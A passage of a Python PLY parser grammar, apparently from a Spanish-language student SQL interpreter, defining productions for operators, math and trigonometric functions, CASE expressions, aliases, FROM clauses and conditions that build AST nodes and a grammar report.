    elif t[2] == OPERACION_STRING.BXOR:
nodo = NodoAST('#')
elif t[2] == OPERACION_STRING.DESPLAZAI:
nodo = NodoAST('\\<\\<')
elif t[2] == OPERACION_STRING.DESPLAZAD:
nodo = NodoAST('\\>\\>')
ret = Retorno(val, nodo)
ret.getNodo().setHijo(NodoAST(str(t[1].valor)))
ret.getNodo().setHijo(NodoAST(str(t[3].valor)))
t[0] = ret
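# The OPERADOR rules below map the bitwise tokens (&, |, #, <<, >>) to
# OPERACION_STRING members; an illustrative input for the two productions
# above would be something like: SELECT 5 & 3, 8 >> 2 AS desplazado;
# (assumed example, shown only to document the grammar).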
def p_ValorOperadorNotA(t):
'VALOR : BNot NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM> <ALIAS>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.BNOT, t[3].getInstruccion()), NodoAST('~'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorOperadorNot(t):
'VALOR : BNot NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.BNOT, None), NodoAST('~'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
t[0] = ret
def p_ValorRaizCuadradaA(t):
'VALOR : raizCuadrada NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM> <ALIAS>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUADRADA, t[3].getInstruccion()), NodoAST('\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorRaizCuadrada(t):
'VALOR : raizCuadrada NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUADRADA, None), NodoAST('\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
t[0] = ret
def p_ValorRaizCubicaA(t):
'VALOR : raizCubica NUM ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM> <ALIAS>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUBICA, t[3].getInstruccion()), NodoAST('\\|\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_ValorRaizCubica(t):
'VALOR : raizCubica NUM '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"" + str(t[1]) + "\" <NUM>")
ret = Retorno(OperacionUnariaS(t[2], OPERACION_STRING.RAIZCUBICA, None), NodoAST('\\|\\|/'))
ret.getNodo().setHijo(NodoAST(str(t[2].valor)))
t[0] = ret
def p_ValorFuncionesGetByte(t):
'VALOR : GETBYTE PABRE CADENA COMA NUMERO PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \")\"")
ret = Retorno(GetByte(t[3], t[5], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
t[0] = ret
def p_ValorFuncionesGetByteA(t):
'VALOR : GETBYTE PABRE CADENA COMA NUMERO PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"GET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \")\" <ALIAS>")
ret = Retorno(GetByte(t[3], t[5], t[7].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('GET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(t[7].getNodo())
t[0] = ret
def p_ValorFuncionesSetByte(t):
'VALOR : SETBYTE PABRE CADENA COMA NUMERO COMA NUMERO PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \",\" \"NUMERO\" \")\"")
ret = Retorno(SetByte(t[3], t[5], t[7], None), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
t[0] = ret
def p_ValorFuncionesSetByteA(t):
'VALOR : SETBYTE PABRE CADENA COMA NUMERO COMA NUMERO PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"SET_BYTE\" \"(\" \"CADENA\" \",\" \"NUMERO\" \",\" \"NUMERO\" \")\" <ALIAS>")
ret = Retorno(SetByte(t[3], t[5], t[7], t[9].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST('SET_BYTE'))
ret.getNodo().setHijo(NodoAST(t[3]))
ret.getNodo().setHijo(NodoAST(t[5]))
ret.getNodo().setHijo(NodoAST(t[7]))
ret.getNodo().setHijo(t[9].getNodo())
t[0] = ret
def p_ValorCase(t):
'VALOR : CASE LWHEN END '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CASE\" <LWHEN> \"END\"")
ret = Retorno(InstruccionCase(t[2].getInstruccion(), None), NodoAST('CASE'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ValorCaseAlias(t):
'VALOR : CASE LWHEN END ALIAS'
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= \"CASE\" <LWHEN> \"END\" <ALIAS>")
ret = Retorno(InstruccionCase(t[2].getInstruccion(), t[4].getInstruccion()), NodoAST('CASE'))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_ValorFunAlias(t):
'VALOR : ID_VALOR PABRE LCONDICION_FUNCION PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <ID_VALOR> \"(\" <LCONDICION_FUNCION> \")\" <ALIAS>")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[5].getInstruccion()), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
ret.getNodo().setHijo(t[5].getNodo())
t[0] = ret
def p_ValorFun(t):
'VALOR : ID_VALOR PABRE LCONDICION_FUNCION PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<VALOR> ::= <ID_VALOR> \"(\" <LCONDICION_FUNCION> \")\"")
ret = Retorno(FuncionesMatematicas(t[1], t[3].getInstruccion(), t[1]), NodoAST('FUNCION'))
ret.getNodo().setHijo(NodoAST(t[1]))
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_LWHEN(t):
'LWHEN : LWHEN PWHEN '
global reporte_gramatical
reporte_gramatical.append("<LWHEN> ::= <LWHEN> <PWHEN>")
val = t[1].getInstruccion()
val.append(t[2].getInstruccion())
ret = Retorno(val, NodoAST('WHEN'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_WHENWHEN(t):
'LWHEN : PWHEN'
global reporte_gramatical
reporte_gramatical.append("<LWHEN> ::= <PWHEN>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('WHEN'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_LWHENSimple(t):
'PWHEN : WHEN CONDICION THEN CONDICION '
global reporte_gramatical
reporte_gramatical.append("<PWHEN> ::= \"WHEN\" <CONDICION> \"THEN\" <CONDICION>")
val = InstruccionWhen(t[2].getInstruccion(), t[4].getInstruccion())
auxval = [val]
ret = Retorno(auxval, NodoAST('VALOR'))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_LWHENElse(t):
'PWHEN : ELSE CONDICION '
global reporte_gramatical
reporte_gramatical.append("<PWHEN> ::= \"ELSE\" <CONDICION>")
val = InstruccionElse(t[2].getInstruccion())
auxval = [val]
ret = Retorno(auxval, NodoAST('ELSE'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
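# Illustrative CASE expression handled by the LWHEN/PWHEN rules above
# (assumed example): CASE WHEN nota >= 61 THEN 'aprobado' ELSE 'reprobado' END AS estado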
def p_IdFuncionDegrees(t):
'ID_VALOR : DEGREES '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"DEGREES\"")
t[0] = 'DEGREES'
def p_IdFuncionDiv(t):
'ID_VALOR : DIV '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"DIV\"")
t[0] = 'DIV'
def p_IdFuncionExp(t):
'ID_VALOR : FEXP '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"EXP\"")
t[0] = 'EXP'
def p_IdFuncionFactorial(t):
'ID_VALOR : FACTORIAL '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"FACTORIAL\"")
t[0] = 'FACTORIAL'
def p_IdFuncionFloor(t):
'ID_VALOR : FLOOR '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"FLOOR\"")
t[0] = 'FLOOR'
def p_IdFuncionGcd(t):
'ID_VALOR : GCD '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"GCD\"")
t[0] = 'GCD'
def p_IdFuncionLn(t):
'ID_VALOR : LN '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"LN\"")
t[0] = 'LN'
def p_IdFuncionLog(t):
'ID_VALOR : LOG '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"LOG\"")
t[0] = 'LOG'
def p_IdFuncionMod(t):
'ID_VALOR : MOD '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"MOD\"")
t[0] = 'MOD'
def p_IdFuncionPower(t):
'ID_VALOR : POWER '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"POWER\"")
t[0] = 'POWER'
def p_IdFuncionRadians(t):
'ID_VALOR : RADIANS '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"RADIANS\"")
t[0] = 'RADIANS'
def p_IdFuncionRound(t):
'ID_VALOR : ROUND '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"ROUND\"")
t[0] = 'ROUND'
def p_IdFuncionSign(t):
'ID_VALOR : SIGN '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"SIGN\"")
t[0] = 'SIGN'
def p_IdFuncionSqrt(t):
'ID_VALOR : SQRT '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"SQRT\"")
t[0] = 'SQRT'
def p_IdFuncionWidth_bucket(t):
'ID_VALOR : WIDTH_BUCKET '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"WIDTH_BUCKET\"")
t[0] = 'WIDTH_BUCKET'
def p_IdFuncionTrunc(t):
'ID_VALOR : TRUNC '
global reporte_gramatical
reporte_gramatical.append("<ID_VALOR> ::= \"TRUNC\"")
t[0] = 'TRUNC'
def p_OPERADORAnd(t):
'OPERADOR : BAnd '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.BAND
def p_OPERADOROr(t):
'OPERADOR : BOr '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.BOR
def p_OPERADORXor(t):
'OPERADOR : BXor '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.BXOR
def p_OPERADORDIz(t):
'OPERADOR : DesplazaI '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.DESPLAZAI
def p_OPERADORDDe(t):
'OPERADOR : DesplazaD '
global reporte_gramatical
reporte_gramatical.append("<OPERADOR> ::= \"" + str(t[1]) + "\"")
t[0] = OPERACION_STRING.DESPLAZAD
def p_LNumNumLNum(t):
'LNUM : LNUM COMA NUM'
global reporte_gramatical
reporte_gramatical.append("<LNUM> ::= <LNUM> \",\" <NUM>")
val = t[1].getInstruccion()
val.append(t[3])
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(NodoAST(str(t[3].valor)))
t[0] = ret
def p_LNumNum(t):
'LNUM : NUM'
global reporte_gramatical
reporte_gramatical.append("<LNUM> ::= <NUM>")
val = [t[1]]
ret = Retorno(val, NodoAST('VALOR'))
ret.getNodo().setHijo(NodoAST(str(t[1].valor)))
t[0] = ret
def p_NumNumero(t):
'NUM : NUMERO '
global reporte_gramatical
reporte_gramatical.append("<NUM> ::= \"NUMERO\"")
t[0] = Numero(t[1])
def p_NumDecimal(t):
'NUM : DECIMALN '
global reporte_gramatical
reporte_gramatical.append("<NUM> ::= \"DECIMALN\"")
t[0] = Decimal(t[1])
def p_NumCadena(t):
'NUM : CADENA '
global reporte_gramatical
reporte_gramatical.append("<NUM> ::= \"CADENA\"")
t[0] = Cadena(t[1])
def p_FTrigonometricasAcos(t):
'FTRIGONOMETRICAS : ACOS '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ACOS\"")
t[0] = 'ACOS'
def p_FTrigonometricasAcosd(t):
'FTRIGONOMETRICAS : ACOSD '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ACOSD\"")
t[0] = 'ACOSD'
def p_FTrigonometricasAsin(t):
'FTRIGONOMETRICAS : ASIN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ASIN\"")
t[0] = 'ASIN'
def p_FTrigonometricasAsind(t):
'FTRIGONOMETRICAS : ASIND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ASIND\"")
t[0] = 'ASIND'
def p_FTrigonometricasAtan(t):
'FTRIGONOMETRICAS : ATAN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAN\"")
t[0] = 'ATAN'
def p_FTrigonometricasAtand(t):
'FTRIGONOMETRICAS : ATAND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAND\"")
t[0] = 'ATAND'
def p_FTrigonometricasAtan2(t):
'FTRIGONOMETRICAS : ATAN2 '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAN2\"")
t[0] = 'ATAN2'
def p_FTrigonometricasAtan2d(t):
'FTRIGONOMETRICAS : ATAN2D '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATAN2D\"")
t[0] = 'ATAN2D'
def p_FTrigonometricasCos(t):
'FTRIGONOMETRICAS : COS '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COS\"")
t[0] = 'COS'
def p_FTrigonometricasCosd(t):
'FTRIGONOMETRICAS : COSD '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COSD\"")
t[0] = 'COSD'
def p_FTrigonometricasCot(t):
'FTRIGONOMETRICAS : COT '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COT\"")
t[0] = 'COT'
def p_FTrigonometricasCotd(t):
'FTRIGONOMETRICAS : COTD '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COTD\"")
t[0] = 'COTD'
def p_FTrigonometricasSin(t):
'FTRIGONOMETRICAS : SIN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"SIN\"")
t[0] = 'SIN'
def p_FTrigonometricasSind(t):
'FTRIGONOMETRICAS : SIND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"SIND\"")
t[0] = 'SIND'
def p_FTrigonometricasTan(t):
'FTRIGONOMETRICAS : TAN '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"TAN\"")
t[0] = 'TAN'
def p_FTrigonometricasTand(t):
'FTRIGONOMETRICAS : TAND '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"TAND\"")
t[0] = 'TAND'
def p_FTrigonometricasSinh(t):
'FTRIGONOMETRICAS : SINH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"SINH\"")
t[0] = 'SINH'
def p_FTrigonometricasCosh(t):
'FTRIGONOMETRICAS : COSH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"COSH\"")
t[0] = 'COSH'
def p_FTrigonometricasTanh(t):
'FTRIGONOMETRICAS : TANH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"TANH\"")
t[0] = 'TANH'
def p_FTrigonometricasAsinh(t):
'FTRIGONOMETRICAS : ASINH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ASINH\"")
t[0] = 'ASINH'
def p_FTrigonometricasAcosh(t):
'FTRIGONOMETRICAS : ACOSH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ACOSH\"")
t[0] = 'ACOSH'
def p_FTrigonometricasAtanh(t):
'FTRIGONOMETRICAS : ATANH '
global reporte_gramatical
reporte_gramatical.append("<FTRIGONOMETRICAS> ::= \"ATANH\"")
t[0] = 'ATANH'
def p_funcionAvg(t):
    'FUNCION : AVG'
    t[0] = 'AVG'
def p_funcionSum(t):
    'FUNCION : SUM'
    t[0] = 'SUM'
def p_funcionMin(t):
    'FUNCION : MIN'
    t[0] = 'MIN'
def p_funcionMax(t):
    'FUNCION : MAX'
    t[0] = 'MAX'
def p_Alias(t):
'ALIAS : AS ID '
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"AS\" \"ID\"")
val_id = Id(t[2], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_AliasS(t):
'ALIAS : ID '
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"ID\"")
val_id = Id(t[1], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_AliasC(t):
'ALIAS : AS IDALIAS'
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"AS\" \"IDALIAS\"")
val_id = Id(t[2], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[2]))
t[0] = ret
def p_AliasCS(t):
'ALIAS : IDALIAS'
global reporte_gramatical
reporte_gramatical.append("<ALIAS> ::= \"IDALIAS\"")
val_id = Id(t[1], None)
ret = Retorno(val_id, NodoAST('Alias'))
ret.getNodo().setHijo(NodoAST(t[1]))
t[0] = ret
def p_PFROM(t):
'PFROM : FROM LVALORESFROM '
global reporte_gramatical
reporte_gramatical.append("<PFROM> ::= \"FROM\" <LVALORESFROM>")
ret = Retorno(t[2].getInstruccion(), NodoAST('FROM'))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_LValoresFrom(t):
'LVALORESFROM : LVALORESFROM COMA VALORFROM '
global reporte_gramatical
reporte_gramatical.append("<LVALORESFROM> ::= <LVALORESFROM> \",\" <VALORFROM>")
val = t[1].getInstruccion()
val.append(t[3].getInstruccion())
ret = Retorno(val, NodoAST('Valor'))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_LValoresFrom1(t):
'LVALORESFROM : VALORFROM '
global reporte_gramatical
reporte_gramatical.append("<LVALORESFROM> ::= <VALORFROM>")
val = [t[1].getInstruccion()]
ret = Retorno(val, NodoAST('Valor'))
ret.getNodo().setHijo(t[1].getNodo())
t[0] = ret
def p_ValoresFromIdAlias(t):
'VALORFROM : ID ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALORFROM> ::= \"ID\" <ALIAS>")
val_id = Id(t[1], t[2].getInstruccion())
ret = Retorno(val_id, NodoAST(t[1]))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_ValoresFromId(t):
'VALORFROM : ID '
global reporte_gramatical
reporte_gramatical.append("<VALORFROM> ::= \"ID\"")
val_id = Id(t[1], None)
ret = Retorno(val_id, NodoAST(t[1]))
t[0] = ret
def p_ValoresFromSub(t):
'VALORFROM : PABRE SUBCONSULTA PCIERRA ALIAS '
global reporte_gramatical
reporte_gramatical.append("<VALORFROM> ::= \"(\" <SUBCONSULTA> \")\" <ALIAS>")
ret = Retorno(Subconsulta(t[2].getInstruccion(), t[4].getInstruccion()), NodoAST('AS'))
ret.getNodo().setHijo(t[2].getNodo())
ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_SubconsultaFrom(t):
'SUBCONSULTA : SELECT VALORES PFROM COMPLEMENTO '
def p_SubconsultaFromW(t):
'SUBCONSULTA : SELECT VALORES PFROM PWHERE COMPLEMENTO '
def p_Where(t):
'PWHERE : WHERE CONDICION '
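# NOTE: SUBCONSULTA and PWHERE attach no semantic action, so the rules that
# consume them (e.g. p_ValorSub, p_CondicionSubConsulta) currently receive None.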
def p_CondicionIgual(t):
'CONDICION : CONDICION IGUAL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.IGUAL),NodoAST("="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionDif(t):
'CONDICION : CONDICION DIF CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"<>\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.DIF),NodoAST("\\<\\>"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionDif1(t):
'CONDICION : CONDICION DIF1 CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"!=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.DIF),NodoAST("!="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMenor(t):
'CONDICION : CONDICION MENOR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"<\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MENOR),NodoAST("\\<"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMenorI(t):
'CONDICION : CONDICION MENORIGUAL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"<=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MENORIGUAL),NodoAST("\\<="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMayor(t):
'CONDICION : CONDICION MAYOR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \">\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MAYOR),NodoAST("\\>"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMayorI(t):
'CONDICION : CONDICION MAYORIGUAL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \">=\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.MAYORIGUAL),NodoAST("\\>="))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionAnd(t):
'CONDICION : CONDICION AND CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"AND\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.AND),NodoAST("AND"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionOr(t):
'CONDICION : CONDICION OR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"OR\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACION_LOGICA.OR),NodoAST("OR"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionNot(t):
'CONDICION : NOT CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"NOT\" <CONDICION>")
ret = Retorno(ExpresionUnaria(t[2].getInstruccion(), OPERACION_LOGICA.NOT), NodoAST("NOT"))
ret.getNodo().setHijo(t[2].getNodo())
t[0] = ret
def p_CondicionParentesis(t):
'CONDICION : PABRE CONDICION PCIERRA '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= \"(\" <CONDICION> \")\"")
t[0] = t[2]
def p_CondicionMas(t):
'CONDICION : CONDICION MAS CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"+\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.MAS),NodoAST("+"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMenos(t):
'CONDICION : CONDICION MENOS CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"-\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.MENOS),NodoAST("-"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionPor(t):
'CONDICION : CONDICION POR CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"*\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.POR),NodoAST("*"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionDiv(t):
'CONDICION : CONDICION DIVIDIDO CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"/\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.DIVIDIDO),NodoAST("/"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionMod(t):
'CONDICION : CONDICION MODULO CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"%\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.MODULO),NodoAST("%"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionExp(t):
'CONDICION : CONDICION EXP CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"^\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.EXP),NodoAST("^"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionIs(t):
'CONDICION : CONDICION IS CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" <CONDICION>")
ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[3].getInstruccion(),OPERACIONES.IS),NodoAST("IS"))
ret.getNodo().setHijo(t[1].getNodo())
ret.getNodo().setHijo(t[3].getNodo())
t[0] = ret
def p_CondicionIsN(t):
'CONDICION : CONDICION IS NULL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"IS\" \"NULL\" <CONDICION>")
    ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[4].getInstruccion(),OPERACIONES.ISNULL),NodoAST("IS NULL"))
    ret.getNodo().setHijo(t[1].getNodo())
    ret.getNodo().setHijo(t[4].getNodo())
t[0] = ret
def p_CondicionNotN(t):
'CONDICION : CONDICION NOT NULL CONDICION '
global reporte_gramatical
reporte_gramatical.append("<CONDICION> ::= <CONDICION> \"NOT\" \"NULL\" <CONDICION>")
    ret = Retorno(ExpresionBinaria(t[1].getInstruccion(),t[4].getInstruccion(),OPERACIONES.NOTNULL),NodoAST("NOT NULL"))
    ret.getNodo().setHijo(t[1].getNodo())
